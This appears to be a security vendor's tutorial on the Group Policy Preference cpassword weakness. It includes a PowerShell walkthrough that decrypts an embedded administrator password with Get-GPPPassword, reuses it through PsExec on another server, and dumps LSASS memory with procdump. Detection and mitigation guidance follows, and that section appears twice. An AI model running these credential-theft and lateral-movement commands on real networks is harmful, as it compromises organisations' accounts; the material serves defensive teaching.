Plaintext Password Extraction using PowerSploit
Group Policy is essential in managing an Active Directory environment. In particular, administrators use it to centrally manage configurations applied to domain-joined servers and workstations; these Group Policies define policies (enforced settings) and preferences, which propagate default configurations that a user can modify.
Unfortunately, Group Policy enabled administrators to embed passwords in Group Policy preferences that created local users or mapped network drives — and those passwords were encrypted with a publicly available key. Therefore, an adversary with the ability to read these policies can readily extract and decrypt these passwords.
In 2014, Microsoft released a security update that removes the ability to create new preferences with embedded passwords, but many organizations still have Group Policy preferences that include embedded passwords.
Attack Tutorial: Plaintext Password Extraction Attack
CPassword
, which contains the encrypted passwords. Adjacent attributes provide other details, like the username. Or they can use tools like PowerSploit’s Get-GPPPasswords cmdlet to automate the process of acquiring and decrypting these passwords, as shown below.PS> Import-Module PowerSploit
PS> Get-GPPPassword
Changed : {2020-08-17 11:14:01}
UserNames : {Administrator (built-in)}
NewName : [BLANK]
Passwords : {WhatAGreatPassword123!}
File : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml
PS>
With this list, the adversary can continue to expand their footprint within the organization. In this example, the adversary connects to another computer and creates a memory dump of the
LSASS.exe
process to enable further lateral movement or privilege escalation.PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
PS> $XML.GPO.LinksTo
SOMName SOMPath Enabled NoOverride
------- ------- ------- ----------
Comp domain.com/Comp true false
PS> $DN = Get-ADOrganizationalUnit -filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select -expand DistinguishedName
PS> Get-ADComputer -filter "*" -SearchBase $DN
DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
DNSHostName :
Enabled : True
Name : Server1
ObjectClass : computer
ObjectGUID : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
SamAccountName : SERVER1$
SID : S-1-5-21-5840559-2756745051-1363507867-16924
UserPrincipalName :
PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
PS>
Detect, Mitigate and Respond
Get-GPPPassword
cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro
ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"
uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local
Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
- Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
- Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
- Adopt solutions that replace embedded passwords with authenticated dynamic lookups.
- Remove the embedded password from the Group Policy preference.
- Reset the password for the account.
Get-GPPPassword
cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro
ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"
uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local
Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
- Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
- Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
- Adopt solutions that replace embedded passwords with authenticated dynamic lookups.
- Remove the embedded password from the Group Policy preference.
- Reset the password for the account.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.